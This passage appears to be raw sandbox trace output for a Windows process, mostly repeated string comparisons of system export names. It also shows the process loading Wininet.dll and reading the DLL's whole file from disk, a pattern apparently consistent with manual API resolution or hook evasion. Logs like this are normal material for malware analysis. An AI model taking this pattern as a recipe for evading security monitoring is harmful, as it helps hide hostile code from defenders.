returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0083.250] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0083.251] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0083.252] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0083.252] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0083.252] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0083.252] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0084.347] GetProcessHeap () returned 0x570000 [0084.347] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c5f0 | out: hHeap=0x570000) returned 1 [0084.348] GetProcessHeap () returned 0x570000 [0084.348] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589160 [0084.348] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0084.359] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0084.359] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0084.359] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0084.359] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0084.359] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0084.360] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0084.360] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0084.360] GetProcessHeap () returned 0x570000 [0084.360] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x286600) returned 0x4172040 [0084.366] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0084.366] ReadFile (in: hFile=0x140, lpBuffer=0x4172040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4172040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0084.676] CloseHandle (hObject=0x140) returned 1 [0084.676] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0084.676] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0084.677] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0084.677] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0084.677] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0084.677] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.677] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0084.678] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0084.678] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0084.678] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0084.678] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0084.679] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.679] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0084.680] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0084.680] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0084.681] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0084.681] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0084.682] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0084.683] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0084.684] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0084.685] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0084.686] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0084.686] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0084.687] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.688] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", 